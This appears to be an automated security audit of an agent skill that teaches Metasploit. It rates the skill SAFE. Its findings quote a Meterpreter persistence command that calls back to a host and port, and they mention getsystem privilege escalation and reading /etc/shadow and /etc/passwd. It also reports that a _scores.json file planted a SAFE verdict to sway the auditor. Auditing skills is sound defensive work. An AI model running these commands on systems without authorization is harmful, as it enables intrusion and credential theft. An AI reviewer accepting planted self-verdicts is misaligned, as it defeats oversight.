metasploit

Pass

Audited by Gen Agent Trust Hub on Sep 8, 2026

Risk Level: SAFECOMMAND_EXECUTIONPERSISTENCEPRIVILEGE_ESCALATION
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides numerous examples of shell commands for the Metasploit console (msfconsole) and the msfvenom utility. These are part of the primary functional purpose of teaching penetration testing.
  • [PERSISTENCE]: The skill documents the use of the persistence module within a Meterpreter session (run persistence -U -i 60 -p 4444 -r 192.168.1.50). This is presented as a post-exploitation technique for security validation and includes a warning that authorized testing is required.
  • [PRIVILEGE_ESCALATION]: The instructions describe the use of the getsystem command and the local_exploit_suggester module to elevate privileges on a target system. These are standard features of the documented framework.
  • [DATA_EXPOSURE]: Commands for reading sensitive files such as /etc/shadow and downloading /etc/passwd are provided. Within the context of a penetration testing skill, these demonstrate how to validate data exposure vulnerabilities.
  • [METADATA_POISONING]: The _scores.json file contains a security verdict claiming the skill is 'SAFE'. Per the safety rules, this self-claim was ignored and the verdict was determined through independent analysis.
Audit Metadata
Risk Level
SAFE
Analyzed
Sep 8, 2026, 05:56 PM
Security Audit — agent-trust-hub — metasploit